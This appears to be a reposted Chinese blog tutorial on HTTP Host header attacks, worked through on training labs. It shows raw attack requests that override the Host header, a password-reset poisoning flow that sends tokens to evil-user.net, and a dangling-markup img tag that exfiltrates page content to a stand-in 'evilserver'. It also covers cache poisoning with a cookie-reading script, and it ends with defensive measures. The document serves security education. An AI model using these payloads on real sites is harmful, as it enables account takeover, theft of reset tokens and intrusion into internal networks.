HTTP Host 頭攻擊,你遇到過嗎?

語言: CN / TW / HK

點選上方 匠心零度 ,選擇“ 設為星標

做積極的人,而不是積極廢人

來源 | blog.csdn.net/angry_program

01、HTTP Host頭攻擊

從HTTP / 1.1開始,HTTP Host標頭是必需的請求標頭。它指定客戶端要訪問的域名。例如,當用戶訪問http://example.net/web-security時,其瀏覽器將組成一個包含Host標頭的請求,如下所示:

GET /web-security HTTP/1.1
Host: example.net

在某些情況下,例如當請求由代理轉發時,Host值可能會在到達預期的後端元件之前進行更改。也就發生了Host頭攻擊。

02、HTTP Host頭的作用

HTTP Host頭的目的是幫助識別客戶端要與之通訊的後端元件。如果請求不包含Host頭或者格式不正確,則在將傳入請求的應用程式時可能會導致問題。

從歷史上看,這種漏洞並不存在太大問題,因為每個IP地址只會被用於單個域的內容。如今,很大程度上是由於同一個IP上存在多個Web應用程式(不同埠,不同域名解析等),通常可以在同一IP地址訪問多個網站和應用程式。這種方法的普及也部分是由於IPv4地址耗盡所致。

當可以通過同一IP地址訪問多個應用程式時,最常見的原因是以下情況之一:

  • 虛擬主機

單個Web伺服器託管多個網站或應用程式。這可能是具有單個所有者的多個網站,但是也可能是不同所有者的網站託管在同一個共享平臺上。它們都與伺服器共享一個公共IP地址。

  • 通過代理路由流量

網站託管在不同的後端伺服器上,但是客戶端和伺服器之間的所有流量都通過代理系統進行路由。這可能是一個簡單的負載平衡裝置或某種反向代理伺服器。在客戶通過內容分發網路(CDN)訪問網站的情況下,這種設定尤其普遍。

在上面兩種種情況下,即使網站託管在單獨的後端伺服器上,它們的所有域名也都解析為中間元件的單個IP地址。這帶來了與虛擬主機相同的問題,因為反向代理或負載平衡需要知道每個請求到的哪個後端上。

HTTP Host頭的作用就在於,指定請求應該傳送到那個應用程式的後端伺服器上。打個比方,一封信需要送到居住在公寓樓中的某人手中,整個公寓有許多房間,每個房間都可以接受信件,通過指定房間號和收件人(也就是HTTP Host頭)來將信封送到指定的人手中。

03、什麼是HTTP Host頭攻擊

一些網站以不安全的方式處理Host頭的值。如果伺服器直接信任Host頭,未校驗它的合法性,則攻擊者可能能夠使用此可控變數來注入Host,以操縱伺服器端的行為。

現成的Web應用程式通常不知道將它們部署在哪個域上,除非在安裝過程中在配置檔案中手動指定了該域。例如,當他們需要知道當前域以生成電子郵件中包含的絕對URL時,他們可能依賴於Host頭中的值:

<a href="http://_SERVER['HOST']/support">聯絡支援</a>

Host頭值還可以用於不同網站系統之間的各種互動。

由於Host頭實際上是使用者可控制的,因此這種做法可能導致許多問題。如果未校驗或者直接使用Host頭,則Host頭可以與一系列其他漏洞“組合拳”攻擊,比如:

  • 快取投毒

  • 特殊業務功能的邏輯漏洞

  • 基於路由的SSRF

  • 經典服務端漏洞,如SQL注入(當Host被用於SQL語句時)等

04、如何發掘HTTP Host頭攻擊

首先要判斷服務端是否檢測Host頭?檢測完了是否還使用Host頭的值?

通過修改Host的值,如果服務端返回錯誤資訊:

則說明服務端檢測了Host的內容。至於有沒有使用Host頭的值,有以下幾種方法去發掘:

05、修改Host值

簡單的來說,可以修改HTTP頭中的Host值,如果觀察到響應包中含有修改後的值,說明存在漏洞。

但有時候篡改Host頭的值會導致無法訪問Web應用程式,從而導致“無效主機頭”的錯誤資訊,特別是通過CDN訪問目標時會發生這種情況。

06、新增重複的Host頭

新增重複的Host頭,通常兩個Host頭之中有一個是有效的,可以理解為一個是確保請求正確地傳送到目標伺服器上;另一個則是傳遞payload到後端伺服器中。

GET /example HTTP/1.1
Host: vulnerable-website.com
Host: attackd-stuff

07、使用絕對路徑的URL

儘管許多請求通常在請求域上使用相對路徑,但是也同時配置了絕對URL的請求。

GET http://vulnerable-website.com/ HTTP/1.1
Host: attack-stuff

有時候也可以嘗試不同的協議,如HTTP或HTTPS。

08、新增縮排或換行

當一些站點block帶有多個Host頭的請求時,可以通過新增縮排字元的HTTP頭來繞過:

GET /example HTTP/1.1
Host: attack-stuff
Host: vulnerable-website.com

09、注入覆蓋Host頭的欄位

與Host頭功能相近的欄位,如X-Forwarded-Host、X-Forwarded-For等,這些有時候是預設開啟的。

GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: attack-stuff

諸如此類,還有其他的欄位:

  • X-Host

  • X-Forwarded-Server

  • X-HTTP-Host-Override

  • Forwarded

10、忽略埠僅校驗域名

當修改、新增重複Host頭被攔截的時候,可以嘗試瞭解Web應用程式是怎樣解析Host頭的。

比如,一些解析演算法會忽略Host頭中的埠值,僅僅校驗域名。這時候可以將Host修改為如下形式:

GET /example HTTP/1.1
Host: vulnerable-website.com:attack-stuff

保持域名不變,修改埠值為非埠號的其他值(非數字), 將Host頭攻擊的payload放在埠值處,同樣能進行Host頭攻擊。

11、HTTP Host頭攻擊漏洞示例

12、密碼重置中毒

根據HTTP Host頭攻擊的攻擊特點,它被廣泛應用於密碼重置中毒:攻擊者可以操縱網站在重置密碼情況下生成的密碼重置連結,使其傳送攻擊者指定的域下,利用此來竊取重置任意使用者密碼的令牌。

一個重設密碼(忘記密碼)功能的大致流程如下:

\1. 使用者輸入其使用者名稱或電子郵件地址,然後提交密碼重置請求。\2. 該網站檢查該使用者是否存在,然後生成一個臨時的、唯一的、複雜的令牌,該令牌與後端的使用者帳戶相關聯。\3. 該網站向用戶傳送一封電子郵件,其中包含用於重置其密碼的連結。重置令牌的引數包含在相應的URL中:

http://normal-website.com/reset?token=0a1b2c3d4e5f6g7h8i9j

\4. 當用戶訪問此URL時,網站將檢查提供的令牌是否有效,並使用它來確定要重置哪個帳戶。如果一切都符合,則可以進入使用者重置密碼步驟。最後,令牌被銷燬。

以上步驟的安全性依賴於:只有目標使用者才能訪問其電子郵件,從而可以訪問其唯一的令牌。

密碼重置中毒是竊取此令牌以更改另一個使用者密碼的一種漏洞。

如果網站重置密碼的流程完全依賴使用者的可控輸入(如HTTP Host頭),這可能導致密碼重置中毒:

\1. 攻擊者獲取受害者的使用者名稱或者電子郵件,作為提交重置密碼的請求,攻擊者會攔截請求並修改HTTP Host頭為其指定的域,如evil-user.net

\2. 受害者會收到一封重置密碼的郵件,但由於攻擊者修改了Host頭,而web程式生成重置連結又完全依賴於Host頭,導致生成以下URL:

http://evil-user.net/reset?token=0a1b2c3d4e5f6g7h8i9j

\3. 如果受害者點選了該連結,重置密碼的令牌就會發送到攻擊者的伺服器 evil-user.net 上

\4. 當攻擊者獲取到蟲子密碼的令牌之後,就會進行相應的構造訪問真實重置密碼的URL進行密碼重置。

13、.1 密碼重置中毒—基礎

詳細瞭解了上面的密碼重置中毒的流程和原理之後,這裡通過HTTP Host頭攻擊導致的基礎的密碼重置中毒來演示。

首先輸入使用者名稱或者使用者的電子郵箱來重置指定使用者的密碼:

提交之後,會發送一封重置密碼的電子郵件到wiener使用者的郵箱中(資料包如右圖):

注意重置密碼的連結,可能是受Host頭的值的影響?

我們來驗證一下是否存在HTTP Host頭攻擊,修改Host頭的值為 baidu.com:

發現請求是可以被後端伺服器接收的,所以是存在HTTP Host頭攻擊的。

這裡就輸入受害使用者carlos進行重置密碼,然後抓包將Host頭的值改為我們自己的伺服器:

然後在我們自己的伺服器上就可以通過訪問日誌看到被竊取的重置密碼Token:

然後根據已知連結規律,構造重置密碼的連結:

http://ac651f551e5317b8800207bd008f000f.web-security-academy.net/forgot-password?temp-forgot-password-token=00YIexUDyNLEJkaBXDoCILWtZAGaxgi7

隨即進入輸入新密碼的介面,密碼重置中毒成功。

14、.2 密碼重置中毒—注入覆蓋Host頭的欄位

有時候直接修改Host頭、新增重複Host頭的值以及混淆Host頭都不行:

可以嘗試使用與Host頭功能相同的HTTP欄位,如X-Forwarded-Host、X-Forwarded-For等,可以進行Fuzz:

實際上他能夠被 X-Forwarded-Host 欄位影響,導致Host頭攻擊,當同時新增多個欄位使請求被攔截時,可以嘗試類似排除法、二分法來排查哪個欄位有效。

對受害使用者carlos進行密碼重置投毒:

然後構造連結即可:

http://acf11f4e1f164378800b165b00bb007d.web-security-academy.net/forgot-password?temp-forgot-password-token=o8gD3Le1K0YQcb2AaASgiI8F2eVI5m3h

15、.3 重置密碼中毒—Dangling Markup技術

首先簡單介紹一下 Dangling Markup技術:

  • Dangling markup技術

Dangling markup技術, 是一種無需指令碼即可竊取頁面內容的技術,它使用影象等資源(結合CSP執行的策略)將資料傳送到攻擊者控制的遠端位置。當反射型XSS不工作或被內容安全策略(CSP)阻止時,它非常有用。其思想是插入一些未完成狀態的部分HTML,例如影象標記的src屬性,頁面上的其餘標記關閉該屬性,但同時將兩者之間的資料(包含竊取頁面的內容)傳送到遠端伺服器。

例如,我們在反射型XSS注入點上注入這樣一個img標籤:

<img src="http://evilserver/?

則注入點和下一個雙引號的程式碼將會發送到攻擊者的 http://evilserver 伺服器, 其中被髮送的程式碼或者內容可能包含一些敏感資訊, 例如CSRF Token等, 配合反射型XSS以完成CSRF的利用。

關於 Dangling Markup技術 的實戰意義可以參考博主之前的文章: 繞過CSP之Dangling markup技術

什麼時候可以使用 Dangling Markup技術 呢?與我們這篇文章的主題有什麼關係呢?

我們直接進入主題,當輸入需要重置密碼的使用者名稱後,該使用者的郵箱內會收到如下郵箱:

有一個跳轉到登入介面的連結,後面緊接著重置之後的隨機密碼。

此時考慮一下,該連結是否是從Host頭取值而來?只要這個值可控,那麼就可以利用Host頭攻擊實施 Dangling Markup攻擊,包含住連結後面緊跟著的密碼,再結合Host頭攻擊將請求指定到攻擊者伺服器上。一個漫天過海的竊取行為就完成了。

  • 第一步,尋找Host頭攻擊點:

通過Fuzz,可發現Host頭攻擊型別為 忽略埠僅校驗域名。即服務端在校驗Host域的時候,僅校驗了域名,忽略了後面的埠號,造成埠值可控(可以是數字或字元):

通過在Host頭的埠中注入payload,依舊可以實現Host頭攻擊。

  • 第二步,藉助可控變數 Host:ip:port 來實施 Dangling Markup技術,從而將後面的密碼外帶到攻擊者伺服器上:

注意,需要閉合此處的雙引號出去,經過嘗試,輸入單引號時,服務端會自動轉為雙引號,故這裡通過單引號將雙引號閉合,然後新增自定的標籤將密碼外帶:

原本的正常HTML是這樣的:

通過 Dangling Markup技術 在標籤的連結中注入? 符,使得後面的值在雙引號閉合之前全部被當做URL引數請求到攻擊者伺服器上:

這也是 Dangling Markup技術 的精髓所在,該技術的核心點在於:

可控變數後面是否接著需要竊取的關鍵資料(包括Token、密碼等)

在攻擊者伺服器上可以看到被Host頭攻擊轉發上來的請求,裡面成功竊取了受害者重置後的密碼:

16、Host頭攻擊+快取投毒

當存在Host頭攻擊的web站點不存在密碼重置的功能的時候,此時該漏洞就顯得沒有影響,因為不可能驅使使用者去抓包修改Host頭,輔助攻擊者完成一系列的攻擊。

但是,如果目標站點使用Web快取,則可以通過快取投毒給其他使用者提供帶有病毒的快取響應。此時的Host頭攻擊漏洞轉變為類似XSS儲存型類的漏洞。要構造Web快取投毒攻擊:

\1. 需要尋找對映到其他使用者請求的快取鍵;
\2. 下一步則是快取此惡意響應;
\3. 然後,此惡意快取將提供給嘗試訪問受影響頁面的所有使用者。
  • 第一步,尋找Host頭攻擊點:

通過對站點的主頁新增重複的Host值,可以達到覆蓋的效果,並驗證存在Host頭攻擊:

  • 第二步,尋找是否使用了Web快取?快取鍵是什麼?

從上圖中也可以發現,站點使用了Wen快取功能,並且配合Host頭攻擊,可以快取 /resources/js/tracking.js 資原始檔。

  • 第三步,在攻擊者伺服器上建立一個同名的 /resources/js/tracking.js 資原始檔,內容為:

alert(document.cookie);

然後通過Host頭注入攻擊者伺服器域名,可以看到在響應中正確地對應了我們的 /resources/js/tracking.js 資原始檔:

傳送多次請求,使該請求的響應變為快取:

當其他使用者請求站點主頁時,服務端就會提供該惡意快取給使用者,造成快取投毒。

17、Host頭攻擊繞過訪問控制

出於安全考慮,通常網站對某些功能的訪問限制為內部使用者使用。但是通過Host頭攻擊一定可能上可以繞過這些限制。

對於一個站點,從發現Host頭攻擊到利用,下面來展示一個完整的流程:

  • 第一步,訪問主頁,隨意修改Host的值:

注意,這裡的Host的值不會出現響應包中,但是依然可能存在Host頭攻擊,因為響應依然成功,說明服務端沒有對Host頭做驗證。

  • 第二步,尋找敏感頁面,通過 /robots.txt 知道 /admin 為做了訪問控制的頁面:

可以錯誤資訊提示,/admin 頁面只允許本地使用者訪問。

  • 第三步,將Host改為服務端內部地址,從而繞過IP訪問控制:

18、Host頭攻擊+SSRF

Host頭攻擊可能會導致基於路由的SSRF攻擊,稱為:Host SSRF Attack。

經典的SSRF攻擊通常基於XXE或可利用的業務邏輯,將使用者可控的URL作為HTTP請求傳送;而基於路由的SSRF依賴於雲部署的體系結構中,包括負載均衡和反向代理,這些中介軟體將請求分配發送到對應的後端伺服器處理,如果服務端未校驗Host頭轉發的請求,則攻擊者可能會將請求傳送(重定向)到體系中的任意系統。

這可能需要知道內部系統的IP地址(私有地址),一般可以通過資訊收集或者Fuzz來判斷有效的私有IP地址(如列舉192.168.1.1/16)。

19、.1 基礎Host頭攻擊+SSRF

比如,普通方式訪問不到 /admin 頁面(404):

猜測 /admin 存在於內網中,需要內網機器才能訪問,但是配合Host頭攻擊+SSRF可以繞過並訪問。

  • 第一步,判斷Host是否被使用,可用DNSLog外帶

這裡我使用Burp自帶的 “Burp Collaborator client” 來實現外帶:

說明服務端是根據Host頭的域名來請求資源的。

  • 第二步,基於Host頭的SSRF探測內網主機

假如一些敏感的頁面(比如管理頁面),深處於內網,外網無法訪問,但是通過Host頭攻擊+SSRF可達到繞過訪問控制,從而訪問內網資產,這裡Fuzz內網的IP的C段為192.168.0.0/24,直接利用Intruder列舉:

得到內網IP為192.168.0.240

  • 第三步,訪問內網資源

構造 /admin 頁面,在Host處換位內網IP:

20、.2 Host頭攻擊+SSRF—使用絕對路徑的URL

有時候服務端會校驗Host頭的值,如果Host被修改,服務端會拒絕一切修改過後的請求:

普通請求通常在請求域上使用相對路徑,但是,服務端也同時可能配置了絕對URL的請求,採用如下形式可繞過對Host的驗證:

GET http://acab1f4b1f3c7628805c2515009a00c9.web-security-academy.net/ HTTP/1.1

接著用 “Burp Collaborator client” 進行外帶:

外帶成功,說明Host頭被服務端使用來向指定域名請求資源,直接SSRF爆破內網:

訪問內網頁面:

21、HTTP Host頭攻擊防護

最簡單的方法是避免在伺服器端程式碼中完全使用Host頭,可以只使用相對URL。

其他方法包括:

22、正確配置絕對域名URL

當必須使用絕對域名URL時,應在配置檔案中手動指定當前域的URL,並引用配置的值,而不是從HTTP的Host頭中獲取。這種方法可防止密碼重置的快取投毒。

23、白名單校驗Host頭的域

如果必須使用Host頭,需要正確校驗它的合法性。這包括允許的域,並使用白名單校驗它,以及拒絕或重定向對無法識別的主機請求。這包括但不僅限於單個web應用程式、負載均衡以及反向代理裝置上。

24、不支援主機頭覆蓋

確保不適用與Host頭功能相近的欄位,如X-Forwarded-Host、X-Forwarded-For等,這些有時候是預設開啟的。

值得一提的是,不應該將內網使用的Host主機(不出網)與公網的應用程式託管在同一個伺服器上,否則攻擊者可能會操縱Host頭來訪問內部域。

END

如果讀完覺得有收穫的話,歡迎點【好看】,關注【匠心零度】,查閱更多精彩歷史!!!

讓我“ 好看 ”